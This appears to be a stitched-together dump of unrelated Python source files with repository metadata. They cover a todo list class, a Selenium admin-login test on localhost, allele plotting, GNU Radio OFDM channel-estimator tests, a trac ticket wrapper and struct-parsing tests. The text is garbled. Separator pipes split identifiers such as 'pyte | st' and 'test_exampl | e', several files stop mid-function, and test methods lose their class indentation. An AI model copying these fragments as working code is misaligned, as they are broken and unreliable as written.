if __name__ == '__main__':
  main()
|
victorgama/todo | todo/itemlist.py | Python | mit | 1,776 | 0.007883 | import collections
import sys
from .parser import Parser
from .item import Item
class ItemList(object):
    """Ordered collection of todo ``Item`` objects, optionally file-backed."""

    # Class-level default kept for backward compatibility with any code that
    # reads ItemList.items; instances always get their own list (see __init__).
    items = []

    def __init__(self, path=None):
        """Create an empty list, or load items from *path* when given."""
        # Always bind a fresh instance attribute: the original relied on the
        # class-level list for path-less instances, which silently shared
        # (and accumulated) items across every ItemList instance.
        self.items = []
        if path:
            self.path = path
            self.items = Parser.parse(path)

    def append(self, *args):
        """Append each Item in *args*; non-Item values are silently skipped."""
        for item in args:
            if isinstance(item, Item):
                self.items.append(item)

    def update(self, item):
        """Replace the first stored item that compares equal to *item*."""
        self.items[self.items.index(item)] = item

    def replace(self, old, new):
        """Replace *old* with *new* in place and return *new*."""
        self.items[self.items.index(old)] = new
        return new

    def prepend(self, item):
        """Insert *item* at the front of the list."""
        self.items.insert(0, item)

    def index(self, item):
        """Return the 1-based position of *item*, or None if absent."""
        dic = self.dict
        for index in dic:
            if dic[index] == item:
                return index

    def build_file(self):
        """Serialize every item back to ``self.path``."""
        text = "".join(item.to_text() for item in self.items)
        # The with-block closes the file; the original also called close()
        # redundantly inside the block.
        with open(self.path, 'w') as io:
            io.write(text)

    def delete(self, item):
        """Remove *item*; also accepts an (index, item) pair as produced by ``all``."""
        # collections.Iterable was removed in Python 3.10; the abc spelling
        # works on all Python 3 versions.
        if isinstance(item, collections.abc.Iterable):
            item = item[1]
        self.items.remove(item)

    def get(self, index, default=None):
        """Return the item at 1-based *index*, or *default* if out of range."""
        return self.dict.get(index, default)

    def get_or_die(self, index):
        """Return the item at 1-based *index*, or print an error and exit."""
        item = self.get(index)
        if not item:
            print('[Ops! There is no todo #{}]'.format(index))
            sys.exit(0)
        return item

    @property
    def undone(self):
        """(1-based index, item) pairs for items whose ``done`` flag is unset."""
        return [item for item in self.all if not item[1].done]

    @property
    def all(self):
        """(1-based index, item) pairs for every item, in order."""
        return [(self.items.index(item) + 1, item) for item in self.items]

    @property
    def dict(self):
        """Mapping of 1-based index -> item."""
        dic = {}
        for item in self.items:
            dic[self.items.index(item) + 1] = item
        return dic
|
byakatat/selenium-training | test_login.py | Python | apache-2.0 | 586 | 0.006826 | import pyte | st
from selenium import webdriver
@pytest.fixture
def driver(request):
    """Provide a Firefox WebDriver (marionette/geckodriver), quit after the test."""
    wd = webdriver.Firefox(capabilities={"marionette": True})
    #(desired_capabilities={"chromeOptions": {"args": ["--start-fullscreen"]}})
    # Ensure the browser is closed even if the test fails.
    request.addfinalizer(wd.quit)
    return wd
def test_exampl | e(driver):
driver.get("http://localhost/litecart/admin/")
driver.find_element_by_xpath("//input[@name='username']").send_keys("admin")
driver.find_element_by_xpath("//input[@name='password']").send_keys("admin")
driver.find_element_by_xpath("//button[@name='login']").click()
|
trmznt/msaf | msaf/lib/tools/allele.py | Python | lgpl-3.0 | 7,523 | 0.026718 |
from collections import defaultdict
from matplotlib import pyplot as plt
from matplotlib.ticker import MultipleLocator
import numpy as np
from msaf.models import Marker
def summarize_alleles2( analytical_sets, temp_dir = None ):
    """Summarize alleles for each analytical set.

    Returns (reports, plot_file): reports keyed by set label, and the path of
    the combined per-colour plot (None when *temp_dir* is not given).
    """
    plots_by_colour = {}
    reports_by_label = {}
    for a_set in analytical_sets:
        report, plot = summarize_alleles3(a_set.get_allele_df())
        reports_by_label[a_set.get_label()] = report
        plots_by_colour[a_set.get_colour()] = plot
    # render all sets into one multi-panel plot
    plot_file = None
    if temp_dir:
        plot_file = make_allele_plot2(plots_by_colour, temp_dir + 'allele_plot.pdf',
                                      analytical_sets)
    return (reports_by_label, plot_file)
def summarize_alleles3( allele_df ):
    """ return a tuple of (dict, dict):
        1dict: alleles: [ (allele, freq, count, mean_height, min_size, max_size, delta), ...]
        2dict: marker: ( [ size, ...], [ height, ....] )
    """
    # allele_list: marker_id -> raw per-allele tuples; allele_plot: marker
    # code -> ([sizes], [heights]) for plotting. The lambda default arg is
    # just a trick to give defaultdict a zero-argument factory.
    allele_list = defaultdict(list)
    allele_plot = defaultdict(lambda x = None: ([], []))
    # one group per (marker, allele value) pair
    grouped = allele_df.groupby( ['marker_id', 'value'] )
    for (marker_id, allele), df in grouped:
        allele_list[marker_id].append(
            (allele, len(df), np.mean( df['height'] ), min(df['size']), max(df['size']),
                list(df['sample_id']), np.mean( df['size'] ))
        )
        code = Marker.get(marker_id).code
        allele_plot[code][0].extend( df['size'] )
        allele_plot[code][1].extend( df['height'] )
    # calculate other stuff
    results = {}
    for marker_id in allele_list:
        alleles = allele_list[marker_id]
        # total observations for this marker; used to derive per-allele frequency
        total_allele = sum( x[1] for x in alleles )
        allele_params = [
            (allele, count/total_allele, count, mean_height, min_size, max_size,
                max_size - min_size, sample_ids, mean_size )
            for (allele, count, mean_height, min_size, max_size, sample_ids, mean_size )
            in alleles
        ]
        delta_status = check_delta( allele_params)
        results[marker_id] = dict(
            code = Marker.get(marker_id).code,
            unique_allele = len(allele_params),
            total_allele = total_allele,
            alleles = allele_params,
            delta_status = delta_status )
    return (results, allele_plot)
def make_allele_plot2( data_plots, filename, analytical_sets = None ):
    """Render one vlines panel per marker (all colours overlaid) into *filename*.

    *data_plots* maps colour -> { marker code -> ([sizes], [heights]) }.
    When *analytical_sets* is given, a final panel holds the colour legend.
    Returns *filename*.
    """
    n = len(data_plots) # number of distinct colors
    markers = set() # number of markers
    for d in data_plots:
        markers.update( list(data_plots[d].keys()) )
    # one row per marker plus one extra row reserved for the legend
    m = len(markers) + 1
    fig = plt.figure( figsize=(21, 4 * m), dpi=600 )
    axes = []
    for idx, marker in enumerate( sorted(markers) ):
        ax = fig.add_subplot( m, 1, idx + 1 )
        # overlay every analytical set's data for this marker in its own colour
        for colour in data_plots:
            data = data_plots[colour][marker]
            ax.vlines( data[0], [0], data[1], colors = [ colour ] )
        ax.get_xaxis().set_tick_params( which='both', direction='out' )
        ax.get_yaxis().set_tick_params( which='both', direction='out' )
        minor_locator = MultipleLocator(1)
        major_locator = MultipleLocator(5)
        ax.get_xaxis().set_major_locator( major_locator )
        ax.get_xaxis().set_minor_locator( minor_locator )
        for label in ax.get_xticklabels():
            label.set_size( 'xx-small' )
        for label in ax.get_yticklabels():
            label.set_size( 'xx-small' )
        ax.set_ylabel( marker )
        ax.set_ylim(0)
        #ax.set_xlim(min(data[0]), max(data[0]))
        ax.set_xlim(auto = True)
        axes.append( ax )
    # create the legend plot by creating dummy
    if analytical_sets:
        lx = fig.add_subplot( m, 1, m )
        for analytical_set in analytical_sets:
            # zero-length dummy vlines exist only to populate the legend
            lx.vlines( [0,0], [0], [0,0],
                    colors = [ analytical_set.get_colour() ],
                    label = analytical_set.get_label() )
        leg = lx.legend(ncol = n )
        #lx.set_ylabel( 'Legend' )
        lx.set_axis_off()
    fig.tight_layout()
    fig.savefig( filename )
    plt.close()
    return filename
def summarize_alleles_xxx( allele_df, temp_dir = None ):
    """ return a dict containing:
        alleles: [ (allele, freq, count, mean_height, min_size, max_size, delta), ...]
    """
    # Legacy single-dataframe variant of summarize_alleles3; plot data is only
    # gathered (and rendered) when temp_dir is provided.
    allele_list = defaultdict(list)
    allele_plot = defaultdict(lambda x = None: ([], []))
    grouped = allele_df.groupby( ['marker_id', 'value'] )
    for (marker_id, allele), df in grouped:
        allele_list[marker_id].append(
            (allele, len(df), np.mean( df['height'] ), min(df['size']), max(df['size']), list(df['sample_id']))
        )
        if temp_dir:
            code = Marker.get(marker_id).code
            allele_plot[code][0].extend( df['size'] )
            allele_plot[code][1].extend( df['height'] )
    # calculate other stuff
    results = {}
    for marker_id in allele_list:
        alleles = allele_list[marker_id]
        # total observations for this marker; used for per-allele frequency
        total_allele = sum( x[1] for x in alleles )
        allele_params = [
            (allele, count/total_allele, count, mean_height, min_size, max_size,
                max_size - min_size, sample_ids )
            for (allele, count, mean_height, min_size, max_size, sample_ids) in alleles ]
        delta_status = check_delta( allele_params)
        results[marker_id] = dict(
            code = Marker.get(marker_id).code,
            unique_allele = len(allele_params),
            total_allele = total_allele,
            alleles = allele_params,
            delta_status = delta_status )
    if temp_dir:
        plot_file = make_allele_plot( allele_plot, temp_dir + 'allele_plot.pdf' )
    else:
        plot_file = None
    return (results, plot_file)
def check_delta( alleles ):
    """Flag alleles that are well separated from their neighbours.

    *alleles* is a list of tuples sorted by ascending allele value, where
    element [0] is the value.  Returns one boolean per allele: True when the
    allele differs from every neighbour by more than *threshold*.
    """
    # check if only single allele: trivially well separated
    if len(alleles) <= 1:
        return [ True ]

    threshold = 1
    delta_status = []

    # first allele: only the right-hand neighbour matters
    delta_status.append(alleles[1][0] - alleles[0][0] > threshold)

    # middle alleles: both neighbours must be farther than the threshold
    for i in range(1, len(alleles) - 1):
        delta_status.append(
            alleles[i][0] - alleles[i-1][0] > threshold and
            alleles[i+1][0] - alleles[i][0] > threshold )

    # last allele: only the left-hand neighbour matters.
    # BUG FIX: the original computed alleles[-2][0] - alleles[-1][0] == 1,
    # which is negative for ascending alleles and therefore never flagged the
    # last allele; it also used '== 1' where every other check uses the
    # threshold comparison.
    delta_status.append(alleles[-1][0] - alleles[-2][0] > threshold)

    return delta_status
def make_allele_plot( data_plots, filename ):
    """Render one vlines panel per marker into *filename* (single column).

    *data_plots* maps marker code -> ([sizes], [heights]).  Returns *filename*.
    """
    n = len(data_plots)
    fig = plt.figure( figsize=(21, 4 * n), dpi=600 )
    axes = []
    for idx, key in enumerate( sorted(data_plots) ):
        data = data_plots[key]
        # BUG FIX: subplot indices are 1-based; the original passed the
        # 0-based ``idx`` (cf. make_allele_plot2, which uses idx + 1),
        # which matplotlib rejects for the first panel.
        ax = fig.add_subplot( n, 1, idx + 1 )
        ax.vlines( data[0], [0], data[1] )
        ax.get_xaxis().set_tick_params( which='both', direction='out' )
        ax.get_yaxis().set_tick_params( which='both', direction='out' )
        minor_locator = MultipleLocator(1)
        major_locator = MultipleLocator(5)
        ax.get_xaxis().set_major_locator( major_locator )
        ax.get_xaxis().set_minor_locator( minor_locator )
        for label in ax.get_xticklabels():
            label.set_size( 'xx-small' )
        for label in ax.get_yticklabels():
            label.set_size( 'xx-small' )
        ax.set_ylabel( key )
        axes.append( ax )
    fig.savefig( filename )
    plt.close()
    return filename
|
trabucayre/gnuradio | gr-digital/python/digital/qa_ofdm_chanest_vcvc.py | Python | gpl-3.0 | 13,180 | 0.004325 | #!/usr/bin/env python
# Copyright 2012-2014 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# SPDX-License-Identifier: GPL-3.0-or-later
#
#
import sys
import numpy
import random
import numpy
from gnuradio import gr, gr_unittest, blocks, analog, digital
import pmt
def shift_tuple(vec, N):
    """Shift *vec* right by N positions (left for negative N), zero-filling."""
    data = tuple(vec)
    if N > 0:
        return (0,) * N + data[:-N]
    shift = -N
    return data[shift:] + (0,) * shift
def rand_range(min_val, max_val):
    """ Returns a random value (uniform) from the interval min_val, max_val """
    span = max_val - min_val
    return min_val + random.random() * span
class qa_ofdm_chanest_vcvc (gr_unittest.TestCase):
    def setUp (self):
        # Fixed seed keeps randomized test vectors reproducible across runs.
        random.seed(0)
        self.tb = gr.top_block ()
    def tearDown (self):
        # Drop the flowgraph reference so each test builds a fresh one.
        self.tb = None
    def test_001_offset_2sym (self):
        """ Add a frequency offset, check if it's correctly detected.
        Also add some random tags and see if they come out at the correct
        position. """
        fft_len = 16
        carr_offset = -2
        sync_symbol1 = (0, 0, 0, 1, 0, 1, 0, -1, 0, 1, 0, -1, 0, 1, 0, 0)
        sync_symbol2 = (0, 0, 0, 1, -1, 1, -1, 1, 0, 1, -1, -1, -1, 1, 0, 0)
        data_symbol = (0, 0, 0, 1, -1, 1, -1, 1, 0, 1, -1, -1, -1, 1, 0, 0)
        # Emulate the carrier offset by shifting every transmitted symbol.
        tx_data = shift_tuple(sync_symbol1, carr_offset) + \
                  shift_tuple(sync_symbol2, carr_offset) + \
                  shift_tuple(data_symbol, carr_offset)
        tag1 = gr.tag_t()
        tag1.offset = 0
        tag1.key = pmt.string_to_symbol("test_tag_1")
        tag1.value = pmt.from_long(23)
        tag2 = gr.tag_t()
        tag2.offset = 2
        tag2.key = pmt.string_to_symbol("test_tag_2")
        tag2.value = pmt.from_long(42)
        src = blocks.vector_source_c(tx_data, False, fft_len, (tag1, tag2))
        chanest = digital.ofdm_chanest_vcvc(sync_symbol1, sync_symbol2, 1)
        sink = blocks.vector_sink_c(fft_len)
        self.tb.connect(src, chanest, sink)
        self.tb.run()
        # Shifting back by the offset must recover the original data symbol.
        self.assertEqual(shift_tuple(sink.data(), -carr_offset), data_symbol)
        tags = sink.tags()
        ptags = {}
        for tag in tags:
            ptag = gr.tag_to_python(tag)
            ptags[ptag.key] = (ptag.value, ptag.offset)
            # Channel-tap values are not compared here, only their presence.
            if ptag.key == 'ofdm_sync_chan_taps':
                ptags[ptag.key] = (None, ptag.offset)
        expected_tags = {
            'ofdm_sync_carr_offset': (-2, 0),
            'ofdm_sync_chan_taps': (None, 0),
            'test_tag_1': (23, 0),
            'test_tag_2': (42, 0),
        }
        self.assertEqual(ptags, expected_tags)
    def test_002_offset_1sym (self):
        """ Add a frequency offset, check if it's correctly detected.
        Difference to previous test is, it only uses one synchronisation symbol. """
        fft_len = 16
        carr_offset = -2
        # This will not correct for +2 because it thinks carrier 14 is used
        # (because of interpolation)
        sync_symbol = (0, 0, 0, 1, 0, 1, 0, -1, 0, 1, 0, -1, 0, 1, 0, 0)
        data_symbol = (0, 0, 0, 1, -1, 1, -1, 1, 0, 1, -1, -1, -1, 1, 0, 0)
        tx_data = shift_tuple(sync_symbol, carr_offset) + \
                  shift_tuple(data_symbol, carr_offset)
        src = blocks.vector_source_c(tx_data, False, fft_len)
        # 17 is out of bounds!
        chanest = digital.ofdm_chanest_vcvc(sync_symbol, (), 1, 0, 17)
        sink = blocks.vector_sink_c(fft_len)
        self.tb.connect(src, chanest, sink)
        self.tb.run()
        self.assertEqual(shift_tuple(sink.data(), -carr_offset), data_symbol)
        tags = sink.tags()
        for tag in tags:
            if pmt.symbol_to_string(tag.key) == 'ofdm_sync_carr_offset':
                # NOTE(review): carr_offset_hat is assigned but never used.
                carr_offset_hat = pmt.to_long(tag.value)
                self.assertEqual(pmt.to_long(tag.value), carr_offset)
    def test_003_channel_no_carroffset (self):
        """ Add a channel, check if it's correctly estimated """
        fft_len = 16
        carr_offset = 0
        sync_symbol1 = (0, 0, 0, 1, 0, 1, 0, -1, 0, 1, 0, -1, 0, 1, 0, 0)
        sync_symbol2 = (0, 0, 0, 1j, -1, 1, -1j, 1j, 0, 1, -1j, -1, -1j, 1, 0, 0)
        data_symbol = (0, 0, 0, 1, -1, 1, -1, 1, 0, 1, -1, -1, -1, 1, 0, 0)
        tx_data = sync_symbol1 + sync_symbol2 + data_symbol
        # Complex per-carrier channel taps applied by the multiplier block.
        channel = [0, 0, 0, 2, -2, 2, 3j, 2, 0, 2, 2, 2, 2, 3, 0, 0]
        src = blocks.vector_source_c(tx_data, False, fft_len)
        chan = blocks.multiply_const_vcc(channel)
        chanest = digital.ofdm_chanest_vcvc(sync_symbol1, sync_symbol2, 1)
        sink = blocks.vector_sink_c(fft_len)
        sink_chanest = blocks.vector_sink_c(fft_len)
        self.tb.connect(src, chan, chanest, sink)
        self.tb.connect((chanest, 1), sink_chanest)
        self.tb.run()
        tags = sink.tags()
        # Data output must equal the data symbol multiplied by the channel.
        self.assertEqual(shift_tuple(sink.data(), -carr_offset), tuple(numpy.multiply(data_symbol, channel)))
        for tag in tags:
            if pmt.symbol_to_string(tag.key) == 'ofdm_sync_carr_offset':
                self.assertEqual(pmt.to_long(tag.value), carr_offset)
            if pmt.symbol_to_string(tag.key) == 'ofdm_sync_chan_taps':
                self.assertEqual(pmt.c32vector_elements(tag.value), channel)
        self.assertEqual(sink_chanest.data(), channel)
    def test_004_channel_no_carroffset_1sym (self):
        """ Add a channel, check if it's correctly estimated.
        Only uses 1 synchronisation symbol. """
        fft_len = 16
        carr_offset = 0
        sync_symbol = (0, 0, 0, 1, 0, 1, 0, -1, 0, 1, 0, -1, 0, 1, 0, 0)
        data_symbol = (0, 0, 0, 1, -1, 1, -1, 1, 0, 1, -1, -1, -1, 1, 0, 0)
        tx_data = sync_symbol + data_symbol
        # Per-carrier channel taps, including negative and complex values.
        channel = [0, 0, 0, 2, 2, 2, 2, 3, 3, 2.5, 2.5, -3, -3, 1j, 1j, 0]
        #channel = (0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0)
        src = blocks.vector_source_c(tx_data, False, fft_len)
        chan = blocks.multiply_const_vcc(channel)
        chanest = digital.ofdm_chanest_vcvc(sync_symbol, (), 1)
        sink = blocks.vector_sink_c(fft_len)
        sink_chanest = blocks.vector_sink_c(fft_len)
        self.tb.connect(src, chan, chanest, sink)
        self.tb.connect((chanest, 1), sink_chanest)
        self.tb.run()
        self.assertEqual(sink_chanest.data(), channel)
        tags = sink.tags()
        for tag in tags:
            if pmt.symbol_to_string(tag.key) == 'ofdm_sync_carr_offset':
                self.assertEqual(pmt.to_long(tag.value), carr_offset)
            if pmt.symbol_to_string(tag.key) == 'ofdm_sync_chan_taps':
                self.assertEqual(pmt.c32vector_elements(tag.value), channel)
def test_005_both_1sym_force (self):
    """ Add a channel, check if it's correctly estimated.
    Only uses 1 synchronisation symbol. """
    fft_len = 16
    carr_offset = 0
    sync_symbol = (0, 0, 0, 1, 0, 1, 0, -1, 0, 1, 0, -1, 0, 1, 0, 0)
    # Here the second argument is a reference symbol instead of a second
    # sync symbol (contrast with test_004, which passes an empty tuple).
    ref_symbol = (0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 0)
    data_symbol = (0, 0, 0, 1, -1, 1, -1, 1, 0, 1, -1, -1, -1, 1, 0, 0)
    tx_data = sync_symbol + data_symbol
    channel = [0, 0, 0, 2, 2, 2, 2.5, 3, 2.5, 2, 2.5, 3, 2, 1, 1, 0]
    src = blocks.vector_source_c(tx_data, False, fft_len)
    chan = blocks.multiply_const_vcc(channel)
    chanest = digital.ofdm_chanest_vcvc(sync_symbol, ref_symbol, 1)
    sink = blocks.vector_sink_c(fft_len)
    self.tb.connect(src, chan, chanest, sink)
    self.tb.run()
    tags = sink.tags()
    # Only the tags are checked here; the channel-taps output port is unused.
    for tag in tags:
        if pmt.symbol_to_string(tag.key) == 'ofdm_sync_carr_offset':
            self.assertEqual(pmt.to_long(tag.value), carr_offset)
        if pmt.symbol_to_string(tag.key) == 'ofdm_sync_chan_taps':
            self.assertEqual(pmt.c32vector_elements(tag.value), channel)
def test_006_channel_and_carroffset (self):
""" Add a channel, check if it's correctly estimated """
fft_len = 16
carr_offset = 2
# Index 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
sync_symbol1 = (0, 0, 0, 1, 0, 1, 0, -1, 0, 1, |
helixyte/tractor | tractor/ticket.py | Python | mit | 15,619 | 0.002945 | """
This file is part of the tractor library.
See LICENSE.txt for licensing, CONTRIBUTORS.txt for contributor information.
Created on Jan 06, 2012.
"""
__docformat__ = 'reStructuredText en'

# Public API of this module.
# FIX: the comma after 'TicketWrapper' was missing, so implicit string
# concatenation silently fused it with the next entry into the bogus name
# 'TicketWrapperTicketAttribute', leaving both real names out of __all__.
__all__ = ['create_wrapper_for_ticket_creation',
           'create_wrapper_for_ticket_update',
           'TicketWrapper',
           'TicketAttribute',
           'TicketAttributeValues',
           'SummaryAttribute',
           'ReporterAttribute',
           'OwnerAttribute',
           'DescriptionAttribute',
           'TypeAttribute',
           'StatusAttribute',
           'PriorityAttribute',
           'MilestoneAttribute',
           'ComponentAttribute',
           'VersionAttribute',
           'SeverityAttribute',
           'ResolutionAttribute',
           'KeywordsAttribute',
           'CcAttribute',
           'ATTRIBUTE_NAMES',
           'ATTRIBUTE_OPTIONS']
def create_wrapper_for_ticket_creation(summary, description, **kw):
    """
    Build a :class:`TicketWrapper` carrying everything required to create
    a new trac ticket.

    :param summary: ticket summary (required for creation).
    :param description: ticket description (required for creation).
    :param kw: any of the optional ticket attributes:
        cc, component, keywords, milestone, owner, priority, reporter,
        resolution, severity, status, type, version.
    """
    # dict(...) raises TypeError on a duplicate 'summary'/'description'
    # keyword, exactly like the direct constructor call would.
    attributes = dict(summary=summary, description=description, **kw)
    return TicketWrapper(**attributes)
def create_wrapper_for_ticket_update(ticket_id, **kw):
    """
    Build a :class:`TicketWrapper` carrying everything required to update
    an existing trac ticket.

    :param ticket_id: ID of the trac ticket to update (required).
    :param kw: any of the optional ticket attributes:
        cc, component, description, keywords, milestone, owner, priority,
        reporter, resolution, severity, status, summary, type, version.
    """
    # dict(...) raises TypeError on a duplicate 'ticket_id' keyword,
    # exactly like the direct constructor call would.
    attributes = dict(ticket_id=ticket_id, **kw)
    return TicketWrapper(**attributes)
class TicketWrapper(object):
"""
Convenience class for ticket data.
"""
def __init__(self, ticket_id=None,
             summary=None,
             description=None,
             reporter=None,
             owner=None,
             cc=None,
             type=None, #pylint: disable=W0622
             status=None,
             priority=None,
             milestone=None,
             component=None,
             severity=None,
             resolution=None,
             version=None,
             keywords=None,
             time=None,
             changetime=None,
             attribute_names_lookup=None,
             attribute_options_lookup=None):
    """
    Constructor for ticket wrappers. All arguments are optional.

    However, if you are going to create a new trac ticket for the trac, you
    must at least pass the following arguments:
     * summary
     * description
    If you are going to update an existing trac ticket, you have to pass
    at least the ticket ID.

    :param attribute_names_lookup and attribute_options_lookup:
        These lookups serve the association of attribute names with
        attribute classes and valid option classes. If you do not
        specify a lookup, the ticket object will use the default
        lookups (ATTRIBUTE_NAMES and ATTRIBUTE_OPTIONS) instead.

    NOTE: the original text of this constructor was corrupted by stray
    separator characters in the signature and docstring; this version
    restores the intended code.
    """
    self.ticket_id = ticket_id
    self.summary = summary
    self.description = description
    self.reporter = reporter
    self.owner = owner
    self.cc = cc
    self.type = type
    self.status = status
    self.priority = priority
    self.severity = severity
    self.resolution = resolution
    self.milestone = milestone
    self.component = component
    self.keywords = keywords
    self.version = version
    self.time = time
    self.changetime = changetime
    if attribute_names_lookup is None:
        attribute_names_lookup = ATTRIBUTE_NAMES
    #: Used to find the ticket attribute classes for attribute names.
    self.__attribute_names_lookup = attribute_names_lookup
    if attribute_options_lookup is None:
        attribute_options_lookup = ATTRIBUTE_OPTIONS
    #: Used to find valid options for attributes with limited value ranges.
    self.__attribute_options_lookup = attribute_options_lookup
@classmethod
def create_from_trac_data(cls, trac_ticket_data):
    """
    Converts the trac ticket return value into a :class:`TicketWrapper` object.

    :param trac_ticket_data: sequence shaped like
        ``[ticket_id, time, changetime, {attribute_name: value}]``
        (as consumed by the indexing below).
    """
    ticket = TicketWrapper(ticket_id=trac_ticket_data[0],
                           time=trac_ticket_data[1],
                           changetime=trac_ticket_data[2])
    # Copy every reported attribute onto the wrapper; trac uses the empty
    # string for "unset", which is normalized to None here.
    for attr_name, attr_value in trac_ticket_data[3].iteritems():  # Python 2 dict API
        if attr_value == '':
            attr_value = None
        setattr(ticket, attr_name, attr_value)
    return ticket
def check_attribute_validity(self, attribute_name, value=None):
    """
    Checks whether a non-optional attribute is present and
    whether each value is a valid option (used before ticket creation
    and update).

    :raises AttributeError: In case of invalid attribute name.
    :raises ValueError: In case of an invalid value.
    """
    # With no explicit value, validate the attribute's current value.
    if value is None:
        value = getattr(self, attribute_name)
    # NOTE(review): an unknown attribute name raises KeyError from these
    # dict lookups, not the AttributeError documented above — confirm.
    attr_cls = self.__attribute_names_lookup[attribute_name]
    options = self.__attribute_options_lookup[attribute_name]
    if value is None:
        # A missing value is only acceptable for optional attributes, or
        # when None is explicitly listed among the valid options.
        if not attr_cls.IS_OPTIONAL:
            if options is None:
                msg = 'The value for a %s attribute must not be None!' \
                      % (attribute_name)
                raise ValueError(msg)
            elif not value in options.ALL:
                msg = 'Invalid value "%s" for attribute %s. Valid ' \
                      'options are: %s.' % (value, attribute_name,
                                            options.ALL)
                raise ValueError(msg)
    else:
        # A set value must be one of the declared options (when any exist).
        if not options is None and not value in options.ALL:
            msg = 'Invalid value "%s" for attribute %s. Valid options ' \
                  'are: %s.' % (value, attribute_name, options.ALL)
            raise ValueError(msg)
def get_value_map_for_ticket_creation(self):
    """
    Returns a value map for ticket creation - non-optional attribute
    with None value will be set to their DEFAULT_VALUE.
    """
    value_map = dict()
    for attr_name, attr_cls in self.__attribute_names_lookup.iteritems():  # Python 2 dict API
        value = getattr(self, attr_name)
        # Summary and description must be passed as extra arguments.
        if attr_name == SummaryAttribute.NAME or \
           attr_name == DescriptionAttribute.NAME:
            # Still validated here, but excluded from the returned map.
            self.check_attribute_validity(attr_name)
            continue
        if value is None:
            if attr_cls.IS_OPTIONAL:
                # Optional and unset: simply omit from the map.
                continue
            else:
                # Required and unset: fall back to the class default.
                value = attr_cls.DEFAULT_VALUE
        self.check_attribute_validity(attr_name, value)
        # DEFAULT_VALUE may itself be None, hence the second check.
        if not value is None:
            value_map[attr_name] = value
    return value_map
def get_value_map_for_update(self):
    """
    Build a map of all attributes that currently carry a value.

    Attributes whose value is None are skipped; every included value is
    validated through :meth:`check_attribute_validity` first.
    """
    result = {}
    for name in self.__attribute_names_lookup:
        current = getattr(self, name)
        if current is None:
            continue
        self.check_attribute_validity(name, current)
        result[name] = current
    return result
def __eq__(self, other):
    """
    Within one realm, tickets are equal if their ID is equal.
    Non-ticket objects never compare equal.
    """
    if not isinstance(other, self.__class__):
        return False
    return self.ticket_id == other.ticket_id
def __ne__(self, other):
"""
Wi |
LRGH/amoco | tests/test_system_structs.py | Python | gpl-2.0 | 3,557 | 0.016025 | import pytest
from amoco.system.structs import *
def test_rawfield():
    # A 'I' field with fcount=2 formats as '2I' (two 4-byte words = 8 bytes);
    # the expected values show byte order: b'\0\x01\x02\x03' -> 0x03020100.
    # Trailing bytes beyond the field size are ignored by unpack.
    f = RawField('I',fcount=2,fname='v')
    assert f.format()=='2I'
    assert f.size()==8
    assert f.unpack(b'\0\x01\x02\x03AAAA') == (0x03020100,0x41414141)
def test_varfield():
    # A VarField has unknown length until data is unpacked: format is the
    # placeholder '#s' and size is infinite beforehand.
    f = VarField('s',fname='string')
    assert f.format()=='#s'
    assert f.size()==float('Infinity')
    # Unpacking consumes up to and including the first NUL byte; the rest
    # of the buffer is ignored. (Original literal was corrupted by a stray
    # ' | ' separator; restored here.)
    assert f.unpack(b'abcdef\0dzdfoihzdofh') == b'abcdef\x00'
    # After unpacking, size and format reflect the concrete 7-byte value.
    assert f.size()==7
    assert f.format()=='7s'
def test_cntfield():
    # A CntField is length-prefixed: '~b' means a leading byte holds the
    # count. Size/format are unknown ('#s', infinite) until data arrives.
    f = CntField('s','~b',fname='bstr')
    assert f.format()=='#s'
    assert f.size()==float('Infinity')
    # Prefix byte 0x04 -> exactly four payload bytes are consumed.
    assert f.unpack(b'\x04abcdefgh') == b'abcd'
    # Concrete size is prefix (1) + payload (4) = 5; format becomes 'b4s'.
    assert f.size()==5
    assert f.format()=='b4s'
def test_StructDefine():
    # Instances of a StructDefine-decorated class must not share mutable
    # state: each instance gets its own fields list, and setting .packed
    # on one instance must not leak to the class or to siblings.
    # (The assignment below was corrupted by a stray ' | ' separator in
    # the original text; restored here.)
    S = StructDefine("B : v")(type('S',(StructCore,),{}))
    a = S()
    b = S()
    assert not (a.fields is b.fields)
    a.packed = True
    assert S.packed == False
    assert b.packed == False
    assert a.packed == True
    a.unpack(b'\x01')
    b.unpack(b'\x02')
    assert a.v == 1
    assert b.v == 2
def test_UnionDefine():
    # Placeholder: UnionDefine has no test coverage yet.
    pass
def test_TypeDefine():
    # S1 refers to the type 'myinteger' before it is defined; TypeDefine
    # calls below resolve it lazily: myinteger = xxx*2, xxx = 'h' (int16).
    @StructDefine("myinteger*1 : z")
    class S1(StructFormatter): pass
    TypeDefine('myinteger', 'xxx', 2)
    TypeDefine('xxx', 'h')
    s = S1()
    xxx = StructDefine.All['xxx']
    myint = StructDefine.All['myinteger']
    # A single 'h' unpacks one little value; myinteger unpacks a pair.
    assert xxx.unpack(b'\x01\x00') == 1
    assert xxx == myint.type
    assert myint.unpack(b'\x01\x00\x02\x00') == [1,2]
    # S1.z is declared as myinteger*1, i.e. a list containing one pair.
    assert s.unpack(b'\x03\x00\x04\x00\x05\x00\x06\x00')
    assert s.z == [[3,4]]
def test_Field_aliasing():
    # S2 and S3 both embed the S1 structure by name; this test documents
    # that the embedded field objects are shared (aliased), so mutating
    # S1.fields[0].order affects subsequent unpacks through both wrappers.
    S1 = StructFactory("S1","I : i")
    @StructDefine("S1 : x")
    class S2(StructFormatter): pass
    @StructDefine("S1 : y")
    class S3(StructFormatter): pass
    s = S2()
    s.unpack(b'\x00\x00\x00\x01')
    assert s.x.i == 0x01000000
    q = S3()
    # Flip the shared field to big-endian: the same logical value now
    # comes from the byte-reversed input.
    S1.fields[0].order = '>'
    q.unpack(b'\x01\x00\x00\x00')
    assert q.y.i == 0x01000000
    # Previously-unpacked values are unaffected by the order change.
    assert s.x.i == 0x01000000
def test_Struct_slop():
    # Alignment padding ("slop"): a char followed by a uint32 pads to 8
    # bytes unless packed=True, in which case it is the raw 5 bytes.
    S1 = StructFactory("S1","c: a\nI : b")
    assert S1.size()==8
    S2 = StructFactory("S2","I: a\nc : b")
    assert S2.size()==8
    S3 = StructFactory("S3","c: a\nI : b",packed=True)
    assert S3.size()==5
    # Unaligned member 'b' starts after 3 padding bytes (\xff filler here).
    s1 = S1().unpack(b'\x41\xff\xff\xff\xef\xcd\xab\x89')
    assert s1.a == b'A'
    assert s1.b == 0x89abcdef
